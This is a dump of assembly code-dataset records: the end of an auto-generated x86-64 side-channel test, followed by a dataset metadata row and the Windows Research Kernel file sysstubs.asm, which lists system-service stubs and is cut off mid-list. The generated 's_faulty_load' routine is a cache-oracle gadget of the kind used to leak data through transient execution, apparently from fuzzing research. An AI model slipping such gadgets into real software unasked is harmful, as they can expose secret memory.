movups (%r13), %xmm5
vpextrq $0, %xmm5, %r8
nop
nop
inc %rbx
lea addresses_normal_ht+0x16b41, %rbx
sub %r8, %r8
mov (%rbx), %rsi
nop
nop
xor %rcx, %rcx
lea addresses_WC_ht+0x17019, %rcx
nop
nop
nop
nop
sub $12806, %r12
mov $0x6162636465666768, %rdi
movq %rdi, %xmm1
vmovups %ymm1, (%rcx)
nop
nop
xor $18632, %r13
lea addresses_WT_ht+0xd2e1, %rcx
nop
nop
cmp %r15, %r15
mov $0x6162636465666768, %r13
movq %r13, (%rcx)
nop
nop
nop
nop
add $52885, %rsi
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r8
pop %r15
pop %r13
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r11
push %r9
push %rdi
push %rdx
push %rsi
// Faulty Load
lea addresses_UC+0x17f41, %rdi
nop
nop
xor %rsi, %rsi
mov (%rdi), %r11w
lea oracles, %r10
and $0xff, %r11
shlq $12, %r11
mov (%r10,%r11,1), %r11
pop %rsi
pop %rdx
pop %rdi
pop %r9
pop %r11
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_UC', 'AVXalign': False, 'size': 32, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'type': 'addresses_UC', 'AVXalign': False, 'size': 2, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'type': 'addresses_D_ht', 'congruent': 1, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 8, 'same': False}}
{'src': {'type': 'addresses_WT_ht', 'congruent': 10, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 1, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'AVXalign': False, 'size': 4, 'NT': False, 'same': False, 'congruent': 0}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 1}}
{'src': {'type': 'addresses_WC_ht', 'congruent': 3, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 2, 'same': False}}
{'src': {'type': 'addresses_UC_ht', 'congruent': 9, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_D_ht', 'congruent': 9, 'same': False}}
{'src': {'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 16, 'NT': False, 'same': False, 'congruent': 10}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 10}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 32, 'NT': False, 'same': False, 'congruent': 3}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 2}}
{'37': 21829}
37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37
*/
| 37.49711
| 2,999
| 0.660552
|
ef5bb08c441876c322aa8fcc25a86f113966f466
| 108,747
|
asm
|
Assembly
|
base/ntos/ke/amd64/sysstubs.asm
|
987432340/wrk-v1.2
|
423d4c22b892bcc97778385bc0a646ed7a3cfbde
|
[
"Intel"
] | 1
|
2022-03-12T13:57:18.000Z
|
2022-03-12T13:57:18.000Z
|
base/ntos/ke/amd64/sysstubs.asm
|
987432340/wrk-v1.2
|
423d4c22b892bcc97778385bc0a646ed7a3cfbde
|
[
"Intel"
] | null | null | null |
base/ntos/ke/amd64/sysstubs.asm
|
987432340/wrk-v1.2
|
423d4c22b892bcc97778385bc0a646ed7a3cfbde
|
[
"Intel"
] | 1
|
2021-11-25T08:18:04.000Z
|
2021-11-25T08:18:04.000Z
|
;++
;
; Copyright (c) Microsoft Corporation. All rights reserved.
;
; You may only use this code if you agree to the terms of the Windows Research Kernel Source Code License agreement (see License.txt).
; If you do not agree to the terms, do not use the code.
;
; Module Name:
;
; sysstubs.asm
;
; Abstract:
;
; This module implements the system service dispatch stub procedures.
;
;--
include ksamd64.inc
STUBS_BEGIN1 macro t
title t
endm
STUBS_BEGIN2 macro t
endm
STUBS_BEGIN3 macro t
endm
STUBS_BEGIN4 macro t
endm
STUBS_BEGIN5 macro t
endm
STUBS_BEGIN6 macro t
endm
STUBS_BEGIN7 macro t
endm
STUBS_BEGIN8 macro t
endm
STUBS_END macro t
end
endm
SYSSTUBS_ENTRY1 macro ServiceNumber, Name, NumArgs
extern KiServiceInternal:proc
extern KiServiceLinkage:proc
NESTED_ENTRY Zw&Name, _TEXT$00,, NoPad
if DBG
mov 8[rsp], rcx ; save argument register
mov 16[rsp], rdx ;
mov 24[rsp], r8 ;
mov 32[rsp], r9 ;
endif
mov rax, rsp ; save stack address
cli ; disable interrupts
sub rsp, 16 ; alignment and dummy SS selector
push rax ; save previous stack pointer
pushfq ; push EFLAGS on stack
push KGDT64_R0_CODE ; push CS selector
lea rax, KiServiceLinkage ; push service linkage RIP
push rax ; push return address
mov eax, ServiceNumber ; set service number
jmp KiServiceInternal ; finish in service dispatcher
push_frame ; mark machine frame push
END_PROLOGUE
NESTED_END Zw&Name, _TEXT$00
endm
SYSSTUBS_ENTRY2 macro ServiceNumber, Name, NumArgs
endm
SYSSTUBS_ENTRY3 macro ServiceNumber, Name, NumArgs
endm
SYSSTUBS_ENTRY4 macro ServiceNumber, Name, NumArgs
endm
SYSSTUBS_ENTRY5 macro ServiceNumber, Name, NumArgs
endm
SYSSTUBS_ENTRY6 macro ServiceNumber, Name, NumArgs
endm
SYSSTUBS_ENTRY7 macro ServiceNumber, Name, NumArgs
endm
SYSSTUBS_ENTRY8 macro ServiceNumber, Name, NumArgs
endm
USRSTUBS_ENTRY1 macro ServiceNumber, Name, NumArgs
altentry Nt&Name
endm
USRSTUBS_ENTRY2 macro ServiceNumber, Name, NumArgs
ifidn <Name>, <QuerySystemTime>
extern RtlQuerySystemTime:proc
endif
LEAF_ENTRY Zw&Name, _TEXT$00, NoPad
ALTERNATE_ENTRY Nt&Name
if DBG
mov 8[rsp], rcx
mov 16[rsp], rdx
mov 24[rsp], r8
mov 32[rsp], r9
endif
ifidn <Name>, <QuerySystemTime>
jmp RtlQuerySystemTime
else
mov r10, rcx
mov eax, ServiceNumber
syscall
ret
endif
LEAF_END Zw&Name, _TEXT$00
endm
USRSTUBS_ENTRY3 macro ServiceNumber, Name, NumArgs
endm
USRSTUBS_ENTRY4 macro ServiceNumber, Name, NumArgs
endm
USRSTUBS_ENTRY5 macro ServiceNumber, Name, NumArgs
endm
USRSTUBS_ENTRY6 macro ServiceNumber, Name, NumArgs
endm
USRSTUBS_ENTRY7 macro ServiceNumber, Name, NumArgs
endm
USRSTUBS_ENTRY8 macro ServiceNumber, Name, NumArgs
endm
STUBS_BEGIN1 <"System Service Stub Procedures">
STUBS_BEGIN2 <"System Service Stub Procedures">
STUBS_BEGIN3 <"System Service Stub Procedures">
STUBS_BEGIN4 <"System Service Stub Procedures">
STUBS_BEGIN5 <"System Service Stub Procedures">
STUBS_BEGIN6 <"System Service Stub Procedures">
STUBS_BEGIN7 <"System Service Stub Procedures">
STUBS_BEGIN8 <"System Service Stub Procedures">
SYSSTUBS_ENTRY1 0, MapUserPhysicalPagesScatter, 0
SYSSTUBS_ENTRY2 0, MapUserPhysicalPagesScatter, 0
SYSSTUBS_ENTRY3 0, MapUserPhysicalPagesScatter, 0
SYSSTUBS_ENTRY4 0, MapUserPhysicalPagesScatter, 0
SYSSTUBS_ENTRY5 0, MapUserPhysicalPagesScatter, 0
SYSSTUBS_ENTRY6 0, MapUserPhysicalPagesScatter, 0
SYSSTUBS_ENTRY7 0, MapUserPhysicalPagesScatter, 0
SYSSTUBS_ENTRY8 0, MapUserPhysicalPagesScatter, 0
SYSSTUBS_ENTRY1 1, WaitForSingleObject, 0
SYSSTUBS_ENTRY2 1, WaitForSingleObject, 0
SYSSTUBS_ENTRY3 1, WaitForSingleObject, 0
SYSSTUBS_ENTRY4 1, WaitForSingleObject, 0
SYSSTUBS_ENTRY5 1, WaitForSingleObject, 0
SYSSTUBS_ENTRY6 1, WaitForSingleObject, 0
SYSSTUBS_ENTRY7 1, WaitForSingleObject, 0
SYSSTUBS_ENTRY8 1, WaitForSingleObject, 0
SYSSTUBS_ENTRY1 2, CallbackReturn, 0
SYSSTUBS_ENTRY2 2, CallbackReturn, 0
SYSSTUBS_ENTRY3 2, CallbackReturn, 0
SYSSTUBS_ENTRY4 2, CallbackReturn, 0
SYSSTUBS_ENTRY5 2, CallbackReturn, 0
SYSSTUBS_ENTRY6 2, CallbackReturn, 0
SYSSTUBS_ENTRY7 2, CallbackReturn, 0
SYSSTUBS_ENTRY8 2, CallbackReturn, 0
SYSSTUBS_ENTRY1 3, ReadFile, 5
SYSSTUBS_ENTRY2 3, ReadFile, 5
SYSSTUBS_ENTRY3 3, ReadFile, 5
SYSSTUBS_ENTRY4 3, ReadFile, 5
SYSSTUBS_ENTRY5 3, ReadFile, 5
SYSSTUBS_ENTRY6 3, ReadFile, 5
SYSSTUBS_ENTRY7 3, ReadFile, 5
SYSSTUBS_ENTRY8 3, ReadFile, 5
SYSSTUBS_ENTRY1 4, DeviceIoControlFile, 6
SYSSTUBS_ENTRY2 4, DeviceIoControlFile, 6
SYSSTUBS_ENTRY3 4, DeviceIoControlFile, 6
SYSSTUBS_ENTRY4 4, DeviceIoControlFile, 6
SYSSTUBS_ENTRY5 4, DeviceIoControlFile, 6
SYSSTUBS_ENTRY6 4, DeviceIoControlFile, 6
SYSSTUBS_ENTRY7 4, DeviceIoControlFile, 6
SYSSTUBS_ENTRY8 4, DeviceIoControlFile, 6
SYSSTUBS_ENTRY1 5, WriteFile, 5
SYSSTUBS_ENTRY2 5, WriteFile, 5
SYSSTUBS_ENTRY3 5, WriteFile, 5
SYSSTUBS_ENTRY4 5, WriteFile, 5
SYSSTUBS_ENTRY5 5, WriteFile, 5
SYSSTUBS_ENTRY6 5, WriteFile, 5
SYSSTUBS_ENTRY7 5, WriteFile, 5
SYSSTUBS_ENTRY8 5, WriteFile, 5
SYSSTUBS_ENTRY1 6, RemoveIoCompletion, 1
SYSSTUBS_ENTRY2 6, RemoveIoCompletion, 1
SYSSTUBS_ENTRY3 6, RemoveIoCompletion, 1
SYSSTUBS_ENTRY4 6, RemoveIoCompletion, 1
SYSSTUBS_ENTRY5 6, RemoveIoCompletion, 1
SYSSTUBS_ENTRY6 6, RemoveIoCompletion, 1
SYSSTUBS_ENTRY7 6, RemoveIoCompletion, 1
SYSSTUBS_ENTRY8 6, RemoveIoCompletion, 1
SYSSTUBS_ENTRY1 7, ReleaseSemaphore, 0
SYSSTUBS_ENTRY2 7, ReleaseSemaphore, 0
SYSSTUBS_ENTRY3 7, ReleaseSemaphore, 0
SYSSTUBS_ENTRY4 7, ReleaseSemaphore, 0
SYSSTUBS_ENTRY5 7, ReleaseSemaphore, 0
SYSSTUBS_ENTRY6 7, ReleaseSemaphore, 0
SYSSTUBS_ENTRY7 7, ReleaseSemaphore, 0
SYSSTUBS_ENTRY8 7, ReleaseSemaphore, 0
SYSSTUBS_ENTRY1 8, ReplyWaitReceivePort, 0
SYSSTUBS_ENTRY2 8, ReplyWaitReceivePort, 0
SYSSTUBS_ENTRY3 8, ReplyWaitReceivePort, 0
SYSSTUBS_ENTRY4 8, ReplyWaitReceivePort, 0
SYSSTUBS_ENTRY5 8, ReplyWaitReceivePort, 0
SYSSTUBS_ENTRY6 8, ReplyWaitReceivePort, 0
SYSSTUBS_ENTRY7 8, ReplyWaitReceivePort, 0
SYSSTUBS_ENTRY8 8, ReplyWaitReceivePort, 0
SYSSTUBS_ENTRY1 9, ReplyPort, 0
SYSSTUBS_ENTRY2 9, ReplyPort, 0
SYSSTUBS_ENTRY3 9, ReplyPort, 0
SYSSTUBS_ENTRY4 9, ReplyPort, 0
SYSSTUBS_ENTRY5 9, ReplyPort, 0
SYSSTUBS_ENTRY6 9, ReplyPort, 0
SYSSTUBS_ENTRY7 9, ReplyPort, 0
SYSSTUBS_ENTRY8 9, ReplyPort, 0
SYSSTUBS_ENTRY1 10, SetInformationThread, 0
SYSSTUBS_ENTRY2 10, SetInformationThread, 0
SYSSTUBS_ENTRY3 10, SetInformationThread, 0
SYSSTUBS_ENTRY4 10, SetInformationThread, 0
SYSSTUBS_ENTRY5 10, SetInformationThread, 0
SYSSTUBS_ENTRY6 10, SetInformationThread, 0
SYSSTUBS_ENTRY7 10, SetInformationThread, 0
SYSSTUBS_ENTRY8 10, SetInformationThread, 0
SYSSTUBS_ENTRY1 11, SetEvent, 0
SYSSTUBS_ENTRY2 11, SetEvent, 0
SYSSTUBS_ENTRY3 11, SetEvent, 0
SYSSTUBS_ENTRY4 11, SetEvent, 0
SYSSTUBS_ENTRY5 11, SetEvent, 0
SYSSTUBS_ENTRY6 11, SetEvent, 0
SYSSTUBS_ENTRY7 11, SetEvent, 0
SYSSTUBS_ENTRY8 11, SetEvent, 0
SYSSTUBS_ENTRY1 12, Close, 0
SYSSTUBS_ENTRY2 12, Close, 0
SYSSTUBS_ENTRY3 12, Close, 0
SYSSTUBS_ENTRY4 12, Close, 0
SYSSTUBS_ENTRY5 12, Close, 0
SYSSTUBS_ENTRY6 12, Close, 0
SYSSTUBS_ENTRY7 12, Close, 0
SYSSTUBS_ENTRY8 12, Close, 0
SYSSTUBS_ENTRY1 13, QueryObject, 1
SYSSTUBS_ENTRY2 13, QueryObject, 1
SYSSTUBS_ENTRY3 13, QueryObject, 1
SYSSTUBS_ENTRY4 13, QueryObject, 1
SYSSTUBS_ENTRY5 13, QueryObject, 1
SYSSTUBS_ENTRY6 13, QueryObject, 1
SYSSTUBS_ENTRY7 13, QueryObject, 1
SYSSTUBS_ENTRY8 13, QueryObject, 1
SYSSTUBS_ENTRY1 14, QueryInformationFile, 1
SYSSTUBS_ENTRY2 14, QueryInformationFile, 1
SYSSTUBS_ENTRY3 14, QueryInformationFile, 1
SYSSTUBS_ENTRY4 14, QueryInformationFile, 1
SYSSTUBS_ENTRY5 14, QueryInformationFile, 1
SYSSTUBS_ENTRY6 14, QueryInformationFile, 1
SYSSTUBS_ENTRY7 14, QueryInformationFile, 1
SYSSTUBS_ENTRY8 14, QueryInformationFile, 1
SYSSTUBS_ENTRY1 15, OpenKey, 0
SYSSTUBS_ENTRY2 15, OpenKey, 0
SYSSTUBS_ENTRY3 15, OpenKey, 0
SYSSTUBS_ENTRY4 15, OpenKey, 0
SYSSTUBS_ENTRY5 15, OpenKey, 0
SYSSTUBS_ENTRY6 15, OpenKey, 0
SYSSTUBS_ENTRY7 15, OpenKey, 0
SYSSTUBS_ENTRY8 15, OpenKey, 0
SYSSTUBS_ENTRY1 16, EnumerateValueKey, 2
SYSSTUBS_ENTRY2 16, EnumerateValueKey, 2
SYSSTUBS_ENTRY3 16, EnumerateValueKey, 2
SYSSTUBS_ENTRY4 16, EnumerateValueKey, 2
SYSSTUBS_ENTRY5 16, EnumerateValueKey, 2
SYSSTUBS_ENTRY6 16, EnumerateValueKey, 2
SYSSTUBS_ENTRY7 16, EnumerateValueKey, 2
SYSSTUBS_ENTRY8 16, EnumerateValueKey, 2
SYSSTUBS_ENTRY1 17, FindAtom, 0
SYSSTUBS_ENTRY2 17, FindAtom, 0
SYSSTUBS_ENTRY3 17, FindAtom, 0
SYSSTUBS_ENTRY4 17, FindAtom, 0
SYSSTUBS_ENTRY5 17, FindAtom, 0
SYSSTUBS_ENTRY6 17, FindAtom, 0
SYSSTUBS_ENTRY7 17, FindAtom, 0
SYSSTUBS_ENTRY8 17, FindAtom, 0
SYSSTUBS_ENTRY1 18, QueryDefaultLocale, 0
SYSSTUBS_ENTRY2 18, QueryDefaultLocale, 0
SYSSTUBS_ENTRY3 18, QueryDefaultLocale, 0
SYSSTUBS_ENTRY4 18, QueryDefaultLocale, 0
SYSSTUBS_ENTRY5 18, QueryDefaultLocale, 0
SYSSTUBS_ENTRY6 18, QueryDefaultLocale, 0
SYSSTUBS_ENTRY7 18, QueryDefaultLocale, 0
SYSSTUBS_ENTRY8 18, QueryDefaultLocale, 0
SYSSTUBS_ENTRY1 19, QueryKey, 1
SYSSTUBS_ENTRY2 19, QueryKey, 1
SYSSTUBS_ENTRY3 19, QueryKey, 1
SYSSTUBS_ENTRY4 19, QueryKey, 1
SYSSTUBS_ENTRY5 19, QueryKey, 1
SYSSTUBS_ENTRY6 19, QueryKey, 1
SYSSTUBS_ENTRY7 19, QueryKey, 1
SYSSTUBS_ENTRY8 19, QueryKey, 1
SYSSTUBS_ENTRY1 20, QueryValueKey, 2
SYSSTUBS_ENTRY2 20, QueryValueKey, 2
SYSSTUBS_ENTRY3 20, QueryValueKey, 2
SYSSTUBS_ENTRY4 20, QueryValueKey, 2
SYSSTUBS_ENTRY5 20, QueryValueKey, 2
SYSSTUBS_ENTRY6 20, QueryValueKey, 2
SYSSTUBS_ENTRY7 20, QueryValueKey, 2
SYSSTUBS_ENTRY8 20, QueryValueKey, 2
SYSSTUBS_ENTRY1 21, AllocateVirtualMemory, 2
SYSSTUBS_ENTRY2 21, AllocateVirtualMemory, 2
SYSSTUBS_ENTRY3 21, AllocateVirtualMemory, 2
SYSSTUBS_ENTRY4 21, AllocateVirtualMemory, 2
SYSSTUBS_ENTRY5 21, AllocateVirtualMemory, 2
SYSSTUBS_ENTRY6 21, AllocateVirtualMemory, 2
SYSSTUBS_ENTRY7 21, AllocateVirtualMemory, 2
SYSSTUBS_ENTRY8 21, AllocateVirtualMemory, 2
SYSSTUBS_ENTRY1 22, QueryInformationProcess, 1
SYSSTUBS_ENTRY2 22, QueryInformationProcess, 1
SYSSTUBS_ENTRY3 22, QueryInformationProcess, 1
SYSSTUBS_ENTRY4 22, QueryInformationProcess, 1
SYSSTUBS_ENTRY5 22, QueryInformationProcess, 1
SYSSTUBS_ENTRY6 22, QueryInformationProcess, 1
SYSSTUBS_ENTRY7 22, QueryInformationProcess, 1
SYSSTUBS_ENTRY8 22, QueryInformationProcess, 1
SYSSTUBS_ENTRY1 23, WaitForMultipleObjects32, 1
SYSSTUBS_ENTRY2 23, WaitForMultipleObjects32, 1
SYSSTUBS_ENTRY3 23, WaitForMultipleObjects32, 1
SYSSTUBS_ENTRY4 23, WaitForMultipleObjects32, 1
SYSSTUBS_ENTRY5 23, WaitForMultipleObjects32, 1
SYSSTUBS_ENTRY6 23, WaitForMultipleObjects32, 1
SYSSTUBS_ENTRY7 23, WaitForMultipleObjects32, 1
SYSSTUBS_ENTRY8 23, WaitForMultipleObjects32, 1
SYSSTUBS_ENTRY1 24, WriteFileGather, 5
SYSSTUBS_ENTRY2 24, WriteFileGather, 5
SYSSTUBS_ENTRY3 24, WriteFileGather, 5
SYSSTUBS_ENTRY4 24, WriteFileGather, 5
SYSSTUBS_ENTRY5 24, WriteFileGather, 5
SYSSTUBS_ENTRY6 24, WriteFileGather, 5
SYSSTUBS_ENTRY7 24, WriteFileGather, 5
SYSSTUBS_ENTRY8 24, WriteFileGather, 5
SYSSTUBS_ENTRY1 25, SetInformationProcess, 0
SYSSTUBS_ENTRY2 25, SetInformationProcess, 0
SYSSTUBS_ENTRY3 25, SetInformationProcess, 0
SYSSTUBS_ENTRY4 25, SetInformationProcess, 0
SYSSTUBS_ENTRY5 25, SetInformationProcess, 0
SYSSTUBS_ENTRY6 25, SetInformationProcess, 0
SYSSTUBS_ENTRY7 25, SetInformationProcess, 0
SYSSTUBS_ENTRY8 25, SetInformationProcess, 0
SYSSTUBS_ENTRY1 26, CreateKey, 3
SYSSTUBS_ENTRY2 26, CreateKey, 3
SYSSTUBS_ENTRY3 26, CreateKey, 3
SYSSTUBS_ENTRY4 26, CreateKey, 3
SYSSTUBS_ENTRY5 26, CreateKey, 3
SYSSTUBS_ENTRY6 26, CreateKey, 3
SYSSTUBS_ENTRY7 26, CreateKey, 3
SYSSTUBS_ENTRY8 26, CreateKey, 3
SYSSTUBS_ENTRY1 27, FreeVirtualMemory, 0
SYSSTUBS_ENTRY2 27, FreeVirtualMemory, 0
SYSSTUBS_ENTRY3 27, FreeVirtualMemory, 0
SYSSTUBS_ENTRY4 27, FreeVirtualMemory, 0
SYSSTUBS_ENTRY5 27, FreeVirtualMemory, 0
SYSSTUBS_ENTRY6 27, FreeVirtualMemory, 0
SYSSTUBS_ENTRY7 27, FreeVirtualMemory, 0
SYSSTUBS_ENTRY8 27, FreeVirtualMemory, 0
SYSSTUBS_ENTRY1 28, ImpersonateClientOfPort, 0
SYSSTUBS_ENTRY2 28, ImpersonateClientOfPort, 0
SYSSTUBS_ENTRY3 28, ImpersonateClientOfPort, 0
SYSSTUBS_ENTRY4 28, ImpersonateClientOfPort, 0
SYSSTUBS_ENTRY5 28, ImpersonateClientOfPort, 0
SYSSTUBS_ENTRY6 28, ImpersonateClientOfPort, 0
SYSSTUBS_ENTRY7 28, ImpersonateClientOfPort, 0
SYSSTUBS_ENTRY8 28, ImpersonateClientOfPort, 0
SYSSTUBS_ENTRY1 29, ReleaseMutant, 0
SYSSTUBS_ENTRY2 29, ReleaseMutant, 0
SYSSTUBS_ENTRY3 29, ReleaseMutant, 0
SYSSTUBS_ENTRY4 29, ReleaseMutant, 0
SYSSTUBS_ENTRY5 29, ReleaseMutant, 0
SYSSTUBS_ENTRY6 29, ReleaseMutant, 0
SYSSTUBS_ENTRY7 29, ReleaseMutant, 0
SYSSTUBS_ENTRY8 29, ReleaseMutant, 0
SYSSTUBS_ENTRY1 30, QueryInformationToken, 1
SYSSTUBS_ENTRY2 30, QueryInformationToken, 1
SYSSTUBS_ENTRY3 30, QueryInformationToken, 1
SYSSTUBS_ENTRY4 30, QueryInformationToken, 1
SYSSTUBS_ENTRY5 30, QueryInformationToken, 1
SYSSTUBS_ENTRY6 30, QueryInformationToken, 1
SYSSTUBS_ENTRY7 30, QueryInformationToken, 1
SYSSTUBS_ENTRY8 30, QueryInformationToken, 1
SYSSTUBS_ENTRY1 31, RequestWaitReplyPort, 0
SYSSTUBS_ENTRY2 31, RequestWaitReplyPort, 0
SYSSTUBS_ENTRY3 31, RequestWaitReplyPort, 0
SYSSTUBS_ENTRY4 31, RequestWaitReplyPort, 0
SYSSTUBS_ENTRY5 31, RequestWaitReplyPort, 0
SYSSTUBS_ENTRY6 31, RequestWaitReplyPort, 0
SYSSTUBS_ENTRY7 31, RequestWaitReplyPort, 0
SYSSTUBS_ENTRY8 31, RequestWaitReplyPort, 0
SYSSTUBS_ENTRY1 32, QueryVirtualMemory, 2
SYSSTUBS_ENTRY2 32, QueryVirtualMemory, 2
SYSSTUBS_ENTRY3 32, QueryVirtualMemory, 2
SYSSTUBS_ENTRY4 32, QueryVirtualMemory, 2
SYSSTUBS_ENTRY5 32, QueryVirtualMemory, 2
SYSSTUBS_ENTRY6 32, QueryVirtualMemory, 2
SYSSTUBS_ENTRY7 32, QueryVirtualMemory, 2
SYSSTUBS_ENTRY8 32, QueryVirtualMemory, 2
SYSSTUBS_ENTRY1 33, OpenThreadToken, 0
SYSSTUBS_ENTRY2 33, OpenThreadToken, 0
SYSSTUBS_ENTRY3 33, OpenThreadToken, 0
SYSSTUBS_ENTRY4 33, OpenThreadToken, 0
SYSSTUBS_ENTRY5 33, OpenThreadToken, 0
SYSSTUBS_ENTRY6 33, OpenThreadToken, 0
SYSSTUBS_ENTRY7 33, OpenThreadToken, 0
SYSSTUBS_ENTRY8 33, OpenThreadToken, 0
SYSSTUBS_ENTRY1 34, QueryInformationThread, 1
SYSSTUBS_ENTRY2 34, QueryInformationThread, 1
SYSSTUBS_ENTRY3 34, QueryInformationThread, 1
SYSSTUBS_ENTRY4 34, QueryInformationThread, 1
SYSSTUBS_ENTRY5 34, QueryInformationThread, 1
SYSSTUBS_ENTRY6 34, QueryInformationThread, 1
SYSSTUBS_ENTRY7 34, QueryInformationThread, 1
SYSSTUBS_ENTRY8 34, QueryInformationThread, 1
SYSSTUBS_ENTRY1 35, OpenProcess, 0
SYSSTUBS_ENTRY2 35, OpenProcess, 0
SYSSTUBS_ENTRY3 35, OpenProcess, 0
SYSSTUBS_ENTRY4 35, OpenProcess, 0
SYSSTUBS_ENTRY5 35, OpenProcess, 0
SYSSTUBS_ENTRY6 35, OpenProcess, 0
SYSSTUBS_ENTRY7 35, OpenProcess, 0
SYSSTUBS_ENTRY8 35, OpenProcess, 0
SYSSTUBS_ENTRY1 36, SetInformationFile, 1
SYSSTUBS_ENTRY2 36, SetInformationFile, 1
SYSSTUBS_ENTRY3 36, SetInformationFile, 1
SYSSTUBS_ENTRY4 36, SetInformationFile, 1
SYSSTUBS_ENTRY5 36, SetInformationFile, 1
SYSSTUBS_ENTRY6 36, SetInformationFile, 1
SYSSTUBS_ENTRY7 36, SetInformationFile, 1
SYSSTUBS_ENTRY8 36, SetInformationFile, 1
SYSSTUBS_ENTRY1 37, MapViewOfSection, 6
SYSSTUBS_ENTRY2 37, MapViewOfSection, 6
SYSSTUBS_ENTRY3 37, MapViewOfSection, 6
SYSSTUBS_ENTRY4 37, MapViewOfSection, 6
SYSSTUBS_ENTRY5 37, MapViewOfSection, 6
SYSSTUBS_ENTRY6 37, MapViewOfSection, 6
SYSSTUBS_ENTRY7 37, MapViewOfSection, 6
SYSSTUBS_ENTRY8 37, MapViewOfSection, 6
SYSSTUBS_ENTRY1 38, AccessCheckAndAuditAlarm, 7
SYSSTUBS_ENTRY2 38, AccessCheckAndAuditAlarm, 7
SYSSTUBS_ENTRY3 38, AccessCheckAndAuditAlarm, 7
SYSSTUBS_ENTRY4 38, AccessCheckAndAuditAlarm, 7
SYSSTUBS_ENTRY5 38, AccessCheckAndAuditAlarm, 7
